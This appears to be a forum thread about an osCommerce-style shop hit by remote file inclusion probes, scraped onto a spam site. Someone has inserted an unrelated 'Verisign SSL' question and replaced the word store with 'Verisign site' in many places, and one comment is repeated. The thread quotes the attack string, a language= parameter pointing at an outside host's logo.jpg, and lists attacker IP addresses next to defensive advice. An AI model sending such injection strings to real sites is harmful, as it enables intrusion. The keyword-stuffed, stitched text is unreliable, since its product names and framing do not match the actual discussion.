snubbr.com

How do I setup and install Verisign SSL on a server?

Get a Verisign SSL certificate for 30 days FREE. Click here to use coupon...

Get a free trial of Verisign SSL certificates. Click here for this special deal...
Quick question... How do I setup and install Verisign SSL on a server? Hoping for any comment. Second question of mine... Hello to all and HELP!!!.

Looking in my User Tracker files I found connections like this :.

Http://www.mydomaine.com/index.php?%20lang...lebsbi/logo.jpg.

The latter part goes to a German porno site. My web hoster can not find out how, and in my index.php there is no unusual script. My images directory is protected and all my other directories have htaccess files so normally are protected..

In my main htaccess file I put a redirect so this will keep the customers on my Verisign site instead of sending them elsewhere, but that doesn't get rid of the cause. Where should I look to find this flaw? My Verisign site is in the root directory, admin is renamed and protected with password, there are no visible files anywhere that do not belong. Help!.

Mandy..

Comments (19)

Hmm... I need to find out myself. I don't know what is the answer to that question. I'll do some research in Google and get back to you if I got an useful answer. You should email the people at Verisign as they probably could assist you..

Comment #1

Delete your entire Verisign site and reinstall from a known-good backup. Make sure that all folders are set to 755 (none should ever be at 777). Files should be 644 except the two configure.php files which should be lower (see thread in link below). Do not rely on the built-in password protection for admin. Setup an .htpasswd file, either manually or through your cpanel..

Then install.

These mods.

That should take care of the problem...

Comment #2

Hello Guy,.

SInce I do not know when this happened as I just this month installed USER TRACKER and THAT is where I saw the intrusion, I do not know what backup to make (I always have 2, but this could have been happening for a while)..

What would help is if I knew where to find this link that seems to be attached somehow to languages. For the moment the redirect in the htaccess prevents it going back to his Verisign site but I'm too novice to know what to look for..

I tried IP Trap which works so well that online payments can not be made as the payment Verisign site redirects to the store and thus is thrown out!....

Anti XSS I do not understand to install it - I feel like a real nerd with that one. So I am lost..

Site Monitor does not function properly on my webhoster - that must be me as well..

I put in anti-hotlinking code in htaccess (thanks Jack) which eliminates a lot of problems..

How does he link my Verisign site to his?.

Mandy..

Comment #3

First, what version of osc are you using? an older version may be susceptible to an attack like this. what the hacker is hoping is that you're using the $language variable somewhere in your code without checking it's value. newer versions of osc are not as vulnerable to this, so it may be nothing to worry about..

You might still want an ip blocker, but one that allows only you to add to the blocked ip list. that way you can add this guys ip to the block list and he might stop bothering you. obviously he up to no good..

Your problem with Verisign site monitor is most likely not you. your host, like mine, may have disabled reading the directories, which Verisign site monitor needs to use in order to find all the files on your site...

Comment #4

Hi, Dave,.

I'm using 2.2ms2-060817 update and I do have IP Blocking but of course what I see are different IPs arriving with the strange entry point, many from Germany and Eastern block countries and 1 from France so they might be potential customers so it is really hard to know who to block. I can not find any unknown files nor script so I am at a loss to know where else to go! Wish I had installed User Tracker longer ago to know when this started...

Comment #5

Hi there.

Facing same problem, hack attack on my website. I detected this attack in my logs..

The hacker tries to inject a http link the same way as for you, Mandy:.

Http://......../inde...lebsbi/logo.jpg.

This injection is just typed in the adress bar, so don't worry about your code integrity if the variable page or language is cleaned before using it..

I logged IP address also, but seems the hakcer is using a proxy..

Here are the most common IP:.

GeoTrack shows Canada, Japan, Singapore, etc..

65.94.75.216.

122.26.214.58.

70.73.139.29.

118.5.75.156.

202.156.10.13.

58.89.28.196.

67.71.33.243.

88.246.26.146.

202.156.10.243.

202.156.11.3.

218.186.12.11.

59.14.9.47.

As I am bit stupid, I checked.

Http://64.15.67.17/calebsbi/logo.jpg.

, but I get a 404..

I also checked.

Http://64.15.67.17/info.php.

And page exists, using geotracking for this IP shows again Canada, Quebec.

Strange thing, a search of "calebsbi logo.jpg" gives a lot of results, as if this link was a common hacking method....

If you find more about this, please post...

Comment #6

Hello to all and HELP!!!.

Looking in my User Tracker files I found connections like this :.

Http://www.mydomaine.com/index.php?%20lang...lebsbi/logo.jpg.

The latter part goes to a German porno site. My web hoster can not find out how, and in my index.php there is no unusual script. My images directory is protected and all my other directories have htaccess files so normally are protected..

In my main htaccess file I put a redirect so this will keep the customers on my Verisign site instead of sending them elsewhere, but that doesn't get rid of the cause. Where should I look to find this flaw? My Verisign site is in the root directory, admin is renamed and protected with password, there are no visible files anywhere that do not belong. Help!.

Mandy..

Comment #7

PS to clarify, "mydomaine" replaces my real domaine name as I do not want others to hack! and the rest of the link (which disappears on the post is "language=http://64.15.67.17/~calebsbi/logo/jpg" or also index.php?%20language=http://64.15.67.17/~calebsbi/logo/jpg..

Comment #8


This question was taken from a support group/message board and re-posted here so others can learn from it.

 

Categories: Home | Diet & Weight Management | Vitamins & Supplements | Herbs & Cleansing |

Sexual Health | Medifast Support | Nutrisystem Support | Medifast Questions |

Web Hosting | Web Hosts | Website Hosting | Hosting |

Web Hosting | GoDaddy | Digital Cameras | Best WebHosts |

Web Hosting FAQ | Web Hosts FAQ | Hosting FAQ | Hosting Group |

Hosting Questions | Camera Tips | Best Cameras To Buy | Best Cameras This Year |

Camera Q-A | Digital Cameras Q-A | Camera Forum | Nov 2010 - Cameras |

Oct 2010 - Cameras | Oct 2010 - DSLRs | Oct 2010 - Camera Tips | Sep 2010 - Cameras |

Sep 2010 - DSLRS | Sep 2010 - Camera Tips | Aug 2010 - Cameras | Aug 2010 - DSLR Tips |

Aug 2010 - Camera Tips | July 2010 - Cameras | July 2010 - Nikon Cameras | July 2010 - Canon Cameras |

July 2010 - Pentax Cameras | Medifast Recipes | Medifast Recipes Tips | Medifast Recipes Strategies |

Medifast Recipes Experiences | Medifast Recipes Group | Medifast Recipes Forum | Medifast Support Strategies |

Medifast Support Experiences |

 

(C) Copyright 2010 All rights reserved.